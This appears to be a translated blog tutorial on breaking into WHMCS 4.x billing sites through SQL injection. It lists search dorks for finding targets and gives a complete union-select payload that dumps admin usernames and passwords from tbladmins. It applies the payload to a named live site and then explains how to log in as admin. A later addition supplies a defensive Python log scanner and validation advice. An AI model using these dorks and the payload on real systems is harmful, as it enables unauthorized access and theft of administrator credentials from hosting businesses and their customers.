HACK WHMCS WITH SQL INJECTION
Assalamualaikum and greetings. In today's entry I'm going to teach you how to hack WHMCS with SQLi. This vulnerability is present in WHMCS 4.x.
WHMCS? WHMCS is WHMCompleteSolution, a web app that is usually used for commerce sites such as web hosting and domain sites.
OK, let's go!
1. First, find a vulnerable website with a dork:
- intext:"Powered by WHMCompleteSolution"
- inurl:"submitticket.php"
- inurl:dl.php?type=
2. Once you've found a website, it's time to inject. For example, I found this website:
http://www.powermailings.com/billing/dl.php?type=d&id=1
The string for us to inject:
and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
Now add that string to the end of the id number in the website's URL. Example:
http://www.powermailings.com/billing/dl.php?type=d&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
Then press Enter!
When we inject this, if it succeeds our browser will download a file in .pdf format. Inside this file are the Username and Password of that WHMCS :D
3. To log in:
http://www.target.com/path/admin
Example:
http://www.powermailings.com/billing/admin
OK, that's all for this tutorial. Enjoy...
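A defender's view of the request described above, as an added example that is not part of the original post: a log scan that flags dl.php requests whose id parameter is not a plain integer and notes when the same client then requests the admin path. The log lines are constructed, and the integer-only rule for id is an assumption based on the id=1 form shown in the post.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (common log format); IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:01:02 +0000] "GET /billing/dl.php?type=d&id=1 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2024:10:02:11 +0000] "GET /billing/dl.php?type=d&id=1%20and%200x0=0x1%20union%20select%201,2,3,4,CONCAT(username,0x3a3a3a,password),6,7%20from%20tbladmins%20-- HTTP/1.1" 200 812
198.51.100.9 - - [01/Jan/2024:10:02:40 +0000] "GET /billing/admin HTTP/1.1" 200 2301
203.0.113.5 - - [01/Jan/2024:10:05:00 +0000] "GET /billing/admin/ HTTP/1.1" 200 2301
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def is_valid_id(value):
    """Assumption: a legitimate download id is a plain decimal integer."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None

def scan(log_text):
    """Return (injection_hits, followup_ips).

    injection_hits: (ip, decoded id) for dl.php requests whose id is not an integer.
    followup_ips: IPs that requested an admin path after such a request.
    """
    hits, flagged, followups = [], set(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        url = urlsplit(target)
        if url.path.endswith("/dl.php"):
            for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
                if not is_valid_id(value):
                    hits.append((ip, value))
                    flagged.add(ip)
        elif "/admin" in url.path and ip in flagged and ip not in followups:
            followups.append(ip)
    return hits, followups

if __name__ == "__main__":
    hits, followups = scan(SAMPLE_LOG)
    for ip, value in hits:
        print(f"non-integer id from {ip}: {value!r}")
    print("admin access after flagged request:", followups)
```

The same `is_valid_id` rule applied server-side before the value reaches any SQL statement, together with parameterized queries, is what stops the appended string from being interpreted as SQL.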